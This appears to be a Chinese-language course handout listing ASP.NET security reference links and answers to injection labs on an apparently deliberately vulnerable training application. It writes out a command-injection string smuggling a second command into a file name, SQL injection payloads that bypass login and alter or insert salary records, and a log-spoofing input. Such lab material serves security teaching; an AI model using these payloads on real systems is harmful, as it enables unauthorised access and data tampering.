# 2020.06.19 補充教材 validateRequest https://docs.microsoft.com/zh-tw/aspnet/whitepapers/request-validation Connection String http://blog.aihuadesign.com/2014/05/10/asp-net-web-config-read-connectionstring-database-connection-string/ View State https://ithelp.ithome.com.tw/articles/10156037 viewstate的安全 https://www.itread01.com/p/1395112.html ViewState 安全嗎? https://dotblogs.com.tw/pbnttttt/2008/09/06/5309 ## Lab 實作解答 ### Injection Flaws -> Command Injection 使用Burp proxy 再檔名後加上 ``` "%20%26%20ipconfig ``` ### Injection Flaws -> LAB: SQL Injection -> Stage 1 使用Burp proxy 再檔名後加上 ``` 'OR '1'='1 ``` ### Injection Flaws -> Modify Data with SQL Injection ``` jsmith';update salaries set SALARY='10000' where USERID='jsmith';-- ``` ### Injection Flaws -> Add Data with SQL Injection ``` jsmith';INSERT INTO salaries (USERID,SALARY) VALUES ('test', 500);-- ``` ### Injection Flaws -> Log Spoofing ``` test%0aLogin Succeeded for username:admin ```